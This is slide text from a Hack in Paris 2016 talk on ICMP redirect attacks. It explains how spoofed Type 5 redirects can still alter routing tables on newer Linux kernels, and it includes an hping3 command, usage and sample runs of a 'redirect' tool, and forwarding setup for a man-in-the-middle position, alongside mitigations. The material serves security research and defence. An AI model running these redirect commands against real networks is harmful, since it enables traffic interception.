The talk walks through Internet Control Message Protocol basics, focusing on Type=5, Code=1 messages. It briefly describes 'old' ICMP redirect attack and discuss the changes introduced to Linux kernel which made this attack impossible. But did they really? This talk shows that ICMP rediect attack is still easy to perform with some additional steps even if secure_redirects are configured. Successful attack results in a new entry in the targeted host routing table. A testing tool and its capabilities are introduced. The talk also describes prevention steps to secure the environment.
3. 3
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Poland
Dorota Kulas
Senior Red Teamer
15 years in IT
5 years security focused
4. 4
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
An attacker may assume the MITM position by altering
The Routing Table
5. 5
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο First defined in RFC 792 in 1981
ο ISO/OSI Layer 3*
ο Designed to provide feedback about problems in
the communication environment
ο ICMP messages typically report errors in the
processing of IP datagrams
ο These messages are directed to the source IP
address of the originating packet*
6. 6
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Internet Protocol Header
8 Bytes of Next Header
Type Code Checksum
(different purposes)
7. 7
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Internet Header + 64 bits of Data Datagram
The internet header plus the first 64 bits
of the original datagram's data. This data
is used by the host to match the message to
the appropriate process. If a higher level
protocol uses port numbers, they are assumed
to be in the first 64 data bits of the
original datagram's data.
RFC 792
8. 8
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
1 2 3
4
2a
(ICMP Type=5, Code=1)
11. 11
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο Attack works up to Windows XP
ο Versions earlier than Yosemite (10.10.3) β attack works (untested; see
CVE-2015-1103)
ο Attack works for kernel versions prior to 2.6.38
root@attacker# hping3 -I <iface> -C 5 -K 1 -c <count> -a
<current_gw> --icmp-ipdst <target> --icmp-gw <attacker> --icmp-
ipsrc <victim> <victim>
12. 12
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Changes introduced with 3.6.x kernels
ο Checking if redirect packet OS received really comes from current (old)
gateway for particular destination IP address
ο Started using FIB instead of routing table (ip route list table
local|main)
ο ICMP redirects previously were handled in icmp.c, now redirect is being
delivered and handled in respective protocols modules
ο Redirects are validated using 8-byte part of embedded header
13. 13
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Checking if redirect packet OS received really comes from current
(old) gateway for particular destination IP address and using FIB
instead of the routing table
682 if (rt->rt_gateway != old_gw)
683 return;
684
705 n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
706 if (n) {
707 if (!(n->nud_state & NUD_VALID)) {
708 neigh_event_send(n, NULL);
709 } else {
710 if (fib_lookup(net, fl4, &res) == 0) {
711 struct fib_nh *nh = &FIB_RES_NH(res);
712
713 update_or_create_fnhe(nh, fl4->daddr, new_gw,
714 0, 0);
715 }
716 if (kill_route)
717 rt->dst.obsolete = DST_OBSOLETE_KILL;
718 call_netevent_notifiers(NETEVENT_NEIGH_UPDATE, n);
719 }
720 neigh_release(n);
721 }
722 return;
15. 15
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Internet Header + 64 bits of Data Datagram
The internet header plus the first 64 bits
of the original datagram's data. This data
is used by the host to match the message to
the appropriate process. If a higher level
protocol uses port numbers, they are assumed
to be in the first 64 data bits of the
original datagram's data.
RFC 792
17. 17
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Version IHL DSCP |ECN
Flags
Version IHL DSCP |ECN
Flags
8 Bytes of Next Header
Header ChecksumProtocolTTL
Total Length
ID Fragment Offset
Source IP Address
Destination IP Address
Gateway Internet Address
Type Code Checksum
Total Length
ID
Source IP Address
Destination IP Address
TTL Protocol Header Checksum
Fragment Offset
2
3
19. 19
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
= Default GW
= User
= Attacker
= User
= Remote Server
= 5 = 1
20. 20
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
= User
= Remote Server
= Remote Server
= User
2
1
21. 21
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο TCP
ο UDP
ο ICMP Echo Request/Reply
Source Port Destination Port
Sequence Number
Source Port Destination Port
Length Checksum
Identifier Sequence Number
Type=8 Code=0 Header Checksum
Which of these can an attacker control?
(check other protocols too)
23. 23
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο Windows 7 β Attacker uses packet with appropriate (any) trigger
ο Yosemite β In default configuration currently unable to exploit
Kernels
ο 2.6.38 β 3.5.x β packet with trigger (any)
ο 3.6.x β 4.6.0 β packet with trigger (udp)
ο All kernels except for 3.6.x β packet with trigger (icmp)
24. 24
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο Prepare to route a lot of traffic through your host
ο Permit IP forwarding and prepare forwarding
rules as needed
25. 25
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο Linux / Android
ο Windows
ο Mac OS X
sudo sysctl -w net.ipv4.ip_forward=1
Or, as root
echo 1 > sysctl -w net.ipv4.ip_forward=1
sudo sysctl -w net.inet.ip.forwarding=1
Reboot required:
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters /v
IpEnableRouter /t REG_DWORD /d 1 /f
Or (reboot not required):
sc start "RemoteAccess"
26. 26
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
(A) (V)
| |
+--+--+
|
(G)
|
(T)
Usage:
Script will send an ICMP recirect message (or, in fact, couple of network packets, in some cases in a
loop). This is to introduce a new route entry to the attacked system.
Victim (V) is other host within the same LAN segment (or L2 domain). Victim communicates to the
target (T), and this is the connection attacker (A) wants to eavesdrop.
The other piece attacker needs to know is default gateway (G) of the victim, typically it will be the same
router that is attackerβs default gateway.
For TCP, it is the best to choose port which is closed on the victim machine, as sequence
number in response when the RST flag is set is always 0.
For UDP, there's netbios_ns query implemented, it is the best when victim actually
listens for these queries (most of windows machines do).
The best approach is to use ICMP. Use other options if ICMP is not working.
Example:
redirect βA 10.10.10.12 βV 10.10.10.16 βT 4.4.4.4 βG 10.10.10.1
27. 27
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Usage: redirect.go
-A string
[optional] attacker IP address (your primary network interface IP address by default)
-D [optional] debug mode - very verbose
-G string
[required] IP address of the default gatway
-T string
[required] IP address of the target (may be on remote network)
-V string
[required] IP address of the victim (on the same LAN segment as an attacker)
-c int
[optional] clean up: 1 - set route back to default gw
-cpuprofile string
Where to write CPU profile
-d int
[optional] destination port of trigger packet (default 53)
-f [optional] do not spoof source MAC address
-i string
[optional] interface to use
-l float
[optional] send packets in a loop at <number> interval (in seconds)
-n int
[optional] send number of packets if sending in a loop. Set it to -1 to send continously (this
is the default) (default -1)
-p [optional] send a redirect based on a ICMP trigger / ping (this is the default) (default true)
-q [optional] quiet mode - won't print any messages
-s int
[optional] source port of trigger packet
-t [optional] send a redirect based on a TCP trigger
-u [optional] send a redirect based on a UDP trigger
-x [optional] skip trigger
28. 28
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
attacker$ sudo redirect βD -V 10.10.100.19 -G 10.10.100.254 -T 4.4.4.4
2015/09/04 17:45:57 Preparing packet from 10.10.100.254 to 10.10.100.19 to send via interface eth0 (gateway
10.10.100.254)
2015/09/04 17:45:57 Preparing packet from 4.4.4.4 to 10.10.100.19 to send via interface eth0 (gateway
10.10.100.254)
Sending packets (will be redirecting to 10.10.100.5): i.r.
victim$ sudo tshark βn βf icmp
Capturing on 'eth0'
1 4.4.4.4 10.10.100.19 ICMP 60 0.000000 Echo (ping) request id=0x1756, seq=1/256, ttl=64
2 10.10.100.19 4.4.4.4 ICMP 60 0.001161 Echo (ping) reply id=0x1756, seq=1/256, ttl=64 (request in 1)
3 10.10.100.254 10.10.100.19 ICMP 70 0.000646 Redirect (Redirect for host)
victim$ ip route get 4.4.4.4
4.4.4.4 via 10.10.100.5 dev eth0 src 10.10.100.19
cache <redirected>
29. 29
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
attacker$ sudo redirect βD -V 10.10.100.19 -G 10.10.100.254 -T 4.4.4.4 βc 1
2015/09/04 17:47:18 Preparing packet from 10.10.100.5 to 10.10.100.19 to send via interface eth0 (gateway
10.10.100.254)
2015/09/04 17:47:18 Preparing packet from 4.4.4.4 to 10.10.100.19 to send via interface eth0 (gateway
10.10.100.254)
Sending packets (will be redirecting to 10.10.100.254): i.r.
victim$ sudo tshark βn βf icmp
Capturing on 'eth0'
1 4.4.4.4 10.10.100.19 ICMP 60 0.000000 Echo (ping) request id=0x1856, seq=1/256, ttl=64
2 10.10.100.19 4.4.4.4 ICMP 60 0.001161 Echo (ping) reply id=0x1856, seq=1/256, ttl=64 (request in 1)
3 10.10.100.5 10.10.100.19 ICMP 70 0.000646 Redirect (Redirect for host)
victim$ ip route get 4.4.4.4
4.4.4.4 via 10.10.100.254 dev eth0 src 10.10.100.19
cache <redirected>
31. 31
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
All OSes
ο IP address of the gateway the compromised
endpoint is used to communicate with target
Linux kernels 3.6.x
ο ongoing UDP communication between the
compromised endpoint and the target, including
source and destination ports
32. 32
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο One-way MITM (traffic from compromised
endpoint within your LAN to the target) β
unless attacker implements NAT
ο Attack only eligible within local subnet (but
towards remote host outside of LAN)
33. 33
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο Linux / Android
ο Windows
ο Mac OS X
sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
Or, as root
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
sudo sysctl -w net.inet.icmp.drop_redirect=1
sudo sysctl -w net.inet.icmp.log_redirect=1
sudo sysctl βw net.inet6.icmp6.rediraccept=0
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesTcpipParameters
Add value name EnableICMPRedirects, a type REG_DWORD entry, and set the data value to 0
34. 34
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
ο Cisco
ο Port Security (to limit and identify MAC addresses of
the stations allowed to access the port)
ο DHCP Snooping (acts like a firewall between untrusted
hosts and DHCP servers; will drop spoofed packets)
ο IP Source Guard (filters traffic based on the DHCP
snooping binding database and on manually configured
IP source bindings in order to restrict IP traffic on non-
routed Layer 2 interfaces. IP source guard prevents
IP/MAC spoofing)
35. 35
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
RFCs
ο 729 β Internet Control Message Protocol
ο 1122 β Requirements for Internet Hosts -- Communication Layers
ο 1812 β Requirements for IP Version 4 Routers
ο 5927 β ICMP Attacks against TCP
ο 6864 β Updated Specification of the IPv4 ID Field
Links
ο https://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex-
icmp-redirect-attacks-in-the-wild/
ο https://support.apple.com/en-us/HT204659
ο http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-
21.html#anc104
38. 38
Type=5, Code=1 β Hack in Paris 2016
01/07/2016
Maciek is my brother. Few years ago, he was a happy young man
in love, with dreams and plans for the future. This photo was taken
a week before his accident.
The accident happened in May 2013 and caused a swelling of the
brain and hypoxia. The mortality rate for these injuries was set at
89%. The struggle for his life lasted more than two weeks. Maciek
is a fighter β he survived. Unfortunately, he cannot move or speak.
He is fed through a tube (PEG). Thanks to support of many people
we were able to provide him a proper rehabilitation. Maciek made
a great progress. He is now able to sit in a wheelchair, tries to eat
with his mouth and makes first sounds. He communicates with us
using eye movements. To further improve his abilities, we need a
financial support for the rehabilitation and a rehabilitation
equipment.
Maciek is taken care of by my parents, 24x7. Iβm helping as much
as I can, also through spreading the information and asking for
donations.
http://maciejkulas.pl/en